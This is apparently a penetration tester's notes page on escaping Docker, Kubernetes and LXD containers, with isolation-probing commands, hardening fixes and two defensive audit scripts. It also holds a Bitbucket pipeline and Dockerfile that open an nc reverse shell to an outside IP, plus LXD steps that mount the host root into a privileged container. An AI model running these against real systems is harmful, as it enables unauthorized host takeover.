Containers
Kubernetes
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-1/
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-2/
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-3/
Bad Pods: Kubernetes Pod Privilege Escalation
The Kubenomicon: Kubernetes from an offensive perspective
Docker
Escaping Namespaces
https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/
https://www.nccgroup.trust/uk/our-research/abusing-privileged-and-unprivileged-linux-containers/
https://www.nccgroup.trust/uk/our-research/understanding-and-hardening-linux-containers/
https://google.github.io/nsjail/
https://www.youtube.com/watch?v=uQigvjSXMLw
https://docs.docker.com/engine/security/seccomp/
https://www.electricmonk.nl/log/2017/09/30/root-your-docker-host-in-10-seconds-for-fun-and-profit/
Does the Docker daemon have an authorization module?
- check /var/lib/authz-broker/
Does the Docker daemon use user namespaces?
Check for symbolic-link bypass of volume mounting
Check for protections inside a container:
>>> sudo docker run --rm --privileged -v `pwd`:/host -it node:latest /bin/bash
root@acf8b3edec59:/# /host/ami
Container Runtime: docker
Has Namespaces:
pid: true
user: false
AppArmor Profile: unconfined
Capabilities:
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
Check for network namespacing:
>>> sudo docker run --rm --net host -v `pwd`:/host -it node:latest /bin/bash
root@lupin:/#
Check for volume mounting:
>>> sudo docker run --rm --net host --volume /:/rootfs -v `pwd`:/host -it node:latest /bin/bash
root@lupin:/#
Check for device mapping:
>>> sudo docker run --rm --device /:/devhost -v `pwd`:/host -it node:latest /bin/bash
Check for disabling Security Options:
>>> sudo docker run --rm --security-opt seccomp=unconfined -v `pwd`:/host -it node:latest /bin/bash
root@73b3de272685:/# exit
Check for disabling apparmor Security Options:
>>> sudo docker run --rm --security-opt apparmor=unconfined -v `pwd`:/host -it node:latest /bin/bash
root@edb17ce6126a:/# exit
Check for setting Custom Kernel parameters:
>>> sudo docker run --rm --sysctl net.ipv4.ip_forward=1 -v `pwd`:/host -it node:latest /bin/bash
root@d4e604c9db9a:/#
Check for user namespacing:
>>> sudo docker run --rm --userns host -v `pwd`:/host -it node:latest /bin/bash
root@c22b43ed3c91:/# exit
Check for UTS namespacing:
>>> sudo docker run --rm --uts host -v `pwd`:/host -it node:latest /bin/bash
root@c22b43ed3c91:/# exit
Check for additional capabilities:
>>> sudo docker run --rm --cap-add ALL -v `pwd`:/host -it node:latest /bin/bash
root@4fbd268aeb7d:/#
Check for IPC namespacing:
>>> sudo docker run --rm --ipc host -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
Check for Process namespacing:
>>> sudo docker run --rm --pid host -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
Check for Root user namespacing:
>>> sudo docker run --rm --map-root-user -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
Check for mounting:
>>> sudo docker run --rm --mount type=bind,source=/,target=/rootfs -v `pwd`:/host -it node:latest /bin/bash
root@15259ffde075:/#
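The ami output above is what these run-time flags change from the container's point of view. The script below is an added example, not part of the original notes or the ami tool: it reads the same signals straight from /proc (bounding capability mask, seccomp mode, uid map, AppArmor label), so it can be dropped into any container under test. It assumes a Linux /proc and the kernel's capability bit order (bits 0 to 40).

```shell
#!/bin/sh
# Added example, not from the original notes: reproduce from inside a container the
# fields the ami output above lists (user namespace, AppArmor, bounding capabilities,
# seccomp) by reading /proc. Assumes Linux and the kernel's capability bit order.
CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid \
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock \
ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot \
sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control \
setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read perfmon \
bpf checkpoint_restore"   # bits 0-40 (perfmon, bpf, checkpoint_restore: Linux 5.8+)

# decode_caps HEXMASK: names of the capabilities set in a CapBnd mask (/proc/<pid>/status).
decode_caps() {
  mask=$((0x${1:-0})); i=0; out=""
  for name in $CAP_NAMES; do
    [ $(( (mask >> i) & 1 )) -eq 1 ] && out="$out $name"
    i=$((i + 1))
  done
  printf '%s\n' "${out# }"
}
# seccomp_name MODE: meaning of the numeric "Seccomp:" field (0/1/2).
seccomp_name() {
  case "$1" in 0) echo disabled ;; 1) echo strict ;; 2) echo filter ;; *) echo unknown ;; esac
}
# userns_active UID_MAP_LINE: "false" for the identity map "0 0 4294967295" (no
# remapping, as with --userns host), "true" when ids are remapped.
userns_active() {
  set -- $1
  if [ "${1:-}" = 0 ] && [ "${2:-}" = 0 ] && [ "${3:-}" = 4294967295 ]; then echo false; else echo true; fi
}
# report: print the current process's view and flag capabilities beyond Docker's
# default set (CapBnd 00000000a80425fb).
report() {
  st=/proc/self/status
  [ -r "$st" ] || { echo "no /proc/self/status: not a Linux host"; return 0; }
  caps=$(decode_caps "$(awk '/^CapBnd:/ {print $2}' "$st")")
  echo "Has user namespace: $(userns_active "$(cat /proc/self/uid_map)")"
  echo "AppArmor profile:   $(cat /proc/self/attr/current 2>/dev/null || echo unconfined)"
  echo "Bounding caps:      $caps"
  echo "Seccomp:            $(seccomp_name "$(awk '/^Seccomp:/ {print $2}' "$st")")"
  case " $caps " in
    *" sys_admin "*|*" sys_ptrace "*|*" sys_module "*|*" dac_read_search "*)
      echo "WARNING: capabilities beyond Docker's default set are present" ;;
  esac
}
report
```

A mask of 0000003fffffffff decodes to exactly the 38-entry BOUNDING list shown in the --privileged session above; Docker's default 00000000a80425fb decodes to 14 capabilities.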
Reverse Shell through Docker
bitbucket-pipelines.yml:
image:
  name: atlassian/default-image:latest
pipelines:
  default:
    - step:
        script:
          - ln -s / $BITBUCKET_CLONE_DIR/ln
          - curl -oDockerfile https://gist.github.com/staaldraad/b805639cf44363692f13493f651c5689/raw/f8f65876cd464611ad0f7d365a9cf36a950fde36/Dockerfile
          - docker build . -t xyz
          - docker run -i --rm -v $BITBUCKET_CLONE_DIR/ln/:/ln xyz:latest
        services:
          - docker
        caches:
          - docker
Dockerfile:
FROM docker
RUN apk update
RUN echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 139.59.42.102 443 >/tmp/f" > /pew.sh
RUN chmod +x /pew.sh
ENTRYPOINT /pew.sh
Docker Sockets
Docker Socket Locations:
>>> sudo ls -al /var/run/docker/containerd
total 8
drwx------ 3 root root 160 Jan 28 18:00 .
drwx------ 8 root root 180 Jan 28 12:53 ..
srw-rw---- 1 root root 0 Jan 28 12:52 containerd-debug.sock
-rw-r----- 1 root root 6 Jan 28 12:52 containerd.pid
srw-rw---- 1 root root 0 Jan 28 12:52 containerd.sock
srw-rw---- 1 root root 0 Jan 28 12:52 containerd.sock.ttrpc
-rw------- 1 root root 706 Jan 28 12:52 containerd.toml
drwx--x--x 4 root root 80 Jan 28 12:52 daemon
>>> sudo ls -al /var/run/doc*.*
-rw-r--r-- 1 root root 6 Jan 28 12:52 /var/run/docker.pid
srw-rw---- 1 root docker 0 Jan 28 12:52 /var/run/docker.sock
Fixes
Use user namespaces:
- This prevents --pid host, --device, --ipc host,
Prevent removing user namespaces through the authz plugin:
- This can be checked by using the --userns host parameter
Prevent adding unnecessary capabilities:
- --cap-add ALL grants access to kernel functions that would otherwise be restricted
Prevent seccomp bypass through the authz plugin:
- --security-opt seccomp=unconfined
Prevent apparmor bypass through the authz plugin:
- --security-opt apparmor=unconfined
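Each fix above corresponds to a HostConfig field that docker inspect reports for a running container, so the same list can be audited after the fact. The script below is an added example, not from the original notes or from Docker: it checks those fields with sed and case patterns (no jq needed) against SAMPLE, a constructed inspect record using the key names docker emits; on a real host call audit_hostconfig "$(docker inspect "$id")".

```shell
#!/bin/sh
# Added example, not from the original notes: detect the container options the
# Fixes section lists from `docker inspect` output. SAMPLE is a constructed
# container record with the HostConfig keys docker emits; for a real container
# use: audit_hostconfig "$(docker inspect "$id")"
SAMPLE='[{"Id":"c22b43ed3c91","HostConfig":{"Privileged":false,"PidMode":"host",
"IpcMode":"","UsernsMode":"host","CapAdd":["SYS_ADMIN","NET_ADMIN"],
"SecurityOpt":["seccomp=unconfined"],"Devices":[{"PathOnHost":"/dev/sda"}],
"Binds":["/var/run/docker.sock:/var/run/docker.sock"]}}]'

# scalar JSON KEY: value of "KEY": <string|bool|number>, or empty when absent.
scalar() { printf '%s' "$1" | sed -n "s/.*\"$2\": *\"\{0,1\}\([^,\"}]*\)\"\{0,1\}.*/\1/p"; }
# array JSON KEY: comma-joined elements of "KEY": [ ... ], empty when absent or null.
array() { printf '%s' "$1" | sed -n "s/.*\"$2\": *\[\([^]]*\)\].*/\1/p" | tr -d '" '; }

# audit_hostconfig JSON: one line per risky option, nothing when clean; the
# JSON is flattened to one line first so pretty-printed inspect output works.
audit_hostconfig() {
  j=$(printf '%s' "$1" | tr -d '\n')
  [ "$(scalar "$j" Privileged)" = true ] && echo "privileged: full caps, all devices, no seccomp/apparmor"
  [ "$(scalar "$j" PidMode)" = host ] && echo "--pid host: host processes visible and ptrace-able"
  [ "$(scalar "$j" IpcMode)" = host ] && echo "--ipc host: host shared memory and semaphores reachable"
  [ "$(scalar "$j" UsernsMode)" = host ] && echo "--userns host: user namespace remapping disabled"
  caps=$(array "$j" CapAdd);  [ -n "$caps" ] && echo "--cap-add: $caps"
  devs=$(array "$j" Devices); [ -n "$devs" ] && echo "--device: host device nodes mapped in"
  opts=$(array "$j" SecurityOpt)
  case "$opts" in *seccomp=unconfined*)  echo "--security-opt seccomp=unconfined" ;; esac
  case "$opts" in *apparmor=unconfined*) echo "--security-opt apparmor=unconfined" ;; esac
  case "$(array "$j" Binds)" in *docker.sock*) echo "docker.sock mounted: full control of the daemon" ;; esac
  return 0
}
# finding_count JSON: number of findings, for scripting a pass/fail gate.
finding_count() { audit_hostconfig "$1" | wc -l | tr -d ' '; }

audit_hostconfig "$SAMPLE"
```

Run against the constructed SAMPLE it reports six findings (pid host, userns host, cap-add, device, seccomp unconfined, docker.sock bind); a container started with Docker's defaults reports none.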
LXD
Build the LXD image on another machine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
>>> ls
Import the image and init the container:
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
# Show that the image was imported
lxc image list
# Add a privileged container
lxc init myimage ignite -c security.privileged=true
# Mount the host root file system into the container
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
# Start the container
lxc start ignite
# Start a shell in the container
lxc exec ignite /bin/sh